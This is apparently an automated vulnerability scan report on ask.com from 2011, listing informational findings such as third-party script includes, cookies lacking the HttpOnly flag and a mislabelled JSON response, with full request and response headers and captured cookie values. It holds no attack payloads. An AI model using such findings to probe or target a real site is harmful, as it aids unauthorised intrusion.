8.4. http://www.ask.com/pictureslanding  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictureslanding

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pictureslanding?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 24 Mar 2011 16:07:02 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 59137


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>


<tit
...[SNIP]...
</script>
<script language="javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>


<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...
9. Cookie without HttpOnly flag set  previous  next
There are 5 instances of this issue:

9.1. http://www.ask.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; puser=pt=VHVlLTIyLU1hci0yMDExLTE2OjAzOjU4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:05:28 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user=o=0&l=dir; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
Content-Length: 94462

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
9.2. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /answers/7153311/is-nail-polish-bad-for-your-nails

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:09:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA5OjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 118233


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
9.3. http://www.ask.com/ja-ask-dialog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /ja-ask-dialog

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ja-ask-dialog?type=signin HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:05:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/
Content-Length: 68842



...[SNIP]...
9.4. http://www.ask.com/pictures  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pictures?q=Star+Jones&o=0&l=dir&qsrc=3015 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictureslanding?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA3LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:50 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 106391


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
9.5. http://www.ask.com/pictureslanding  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictureslanding

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pictureslanding?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 24 Mar 2011 16:07:02 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 59137


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>


<tit
...[SNIP]...
10. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ask.com
Path:   /ja-local-zoom

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /ja-local-zoom HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUwLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:09:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 82

{"locationList":[{"city":"Irving","state":"TX"},{"city":"Mesquite","state":"TX"}]}
Report generated by XSS.CX at Thu Mar 24 12:49:16 CDT 2011.